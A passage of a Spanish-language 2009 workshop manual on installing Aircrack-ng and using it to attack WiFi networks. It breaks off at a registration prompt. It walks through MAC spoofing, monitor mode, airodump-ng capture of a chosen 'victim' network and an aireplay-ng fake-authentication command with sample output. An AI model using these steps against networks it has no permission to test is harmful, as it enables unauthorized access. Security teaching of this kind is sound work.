Manual de air-crack
Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.-
Paolo Norambuena paolo.norambuena@gmail.com
AIRCRACK-NG
Esta es una guía con fines educativos para el uso y manipulación de Aircrack-ng sobre las distintas distribuciones de Linux. Se explicará desde su instalación en sistemas como Mandriva, Ubuntu, Debian, OpenSuse y SlackWare para que posteriormente noexistan dudas sobre ninguna distribución. En primer lugar debemos tener instalado en nuestro sistema el Driver del Fabricante de nuestra tarjeta de red, aircrack-ng no funciona con drivers emulados por
ndiswrapper.
Instalando Aircrack-ng
En este apartado instalaremos aircrack-ng en las distintas distribuciones comenzando por Ubuntu.
Ubuntu.
$ sudo apt-get install aircrack-ng
Mandriva# urpmi aircrack-ng
OpenSUSE
Descargar:
ftp://ftp.pbone.net/mirror/packman.iu-bremen.de/suse/11.0/SRPMS/aircrack-ng-1.0rc3-0.pm.1.nosrc.rpm
Instalar haciendo Doble Click al paquete una vez descargado.
SlackWare
Descargar http://repository.slacky.eu/slackware-12.2/security/aircrack-ng/1.0rc3/aircrack-ng-1.0rc3i486-1dd.tgz Una vez descargado por consola (terminal – konsole, etc),ejecutar # installpkg aircrack-ng-1.0rc3-i486-1dd.tgz Paquetes complementarios. Una vez instalado aircrack-ng puede ser necesario la instalación de un paquete adicional por lo cual descargaremos IW, que es un complemento para poner nuestra tarjeta inalámbrica en modo monitor. según la distribución será necesario actualizar la librería libnl $ sudo apt-get install libnl1* (ubuntu, debian) # urpmi -alibnl (mandriva) Instalada y/o actualizada la librería procedemos a descargar iw. # wget http://wireless.kernel.org/download/iw/iw-0.9.13.tar.bz2 # tar jxvf iw-0.9.13.tar.bz2 # cd iw-0.9.13 # make #make install Y de esta forma ya tenemos aircrack-ng y su componente para poner en modo monitor nuestra wireless. Ahora solo nos queda empezar a crackear.
Crackeando redes .
Ahora empezamos nuestrotrabajo, lo que se realizó anteriormente solo se hace una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se realiza siempre es lo que a continuación se detalla. Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi macchanger -m 00:11:22:33:44:55 wlan0 Aviso: Las direcciones mac SIEMPRE deben iniciar con 00 Airmon-ng. Airmon-ng es parte de la suite deaircrack-ng la cual permite crear la interfaz mon0 en modo monitor. Su utilización es la siguiente # airmon-ng start wlan0 (o el nombre de la interfaz que puede ser wlan0, eth1, etc)
En caso de que nos muestre un error podemos utilizar iw que instalamos anteriormente. # iw dev wlan0 interface add mon0 type monitor Ya tenemos el primer paso completo.
Airodump-ng # airodump-ng mon0 De esta formaveremos todas las redes disponibles con sus respectivos canales, una vez que ya decidimos que redes son las que vamos a atacar creamos un filtro, paramos la ejecución de airodump-ng presionando Ctrl + C, y posteriormente ejecutamos: -c = Filtro de canal 6, 11, 1, etc. -w = Escribir resultados en un documento. # airodump-ng -c 11 -w nombre mon0 De esta forma hemos creado un filtro que solotrabajará en el canal indicado (11).
Aireplay-Ng Una vez que airodump-ng ya está trabajando, abrimos una nueva consola donde empezaremos a trabajar con aireplay-ng. Lo primero que debemos hacer con aireplay-ng es asociarnos a la red a la cual atacaremos. #aireplay-ng -1 6000 -q 10 -o 1 -e (ESSID victima) -a (Mac Victima) -h (nuestra mac) mon0
18:22:32 Sending Authentication Request 18:22:32Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet
Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac de la víctima?. Bueno, si recordamos en la consola anterior ejecutamos airodump-ng, de esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la...
Regístrate para leer el documento completo.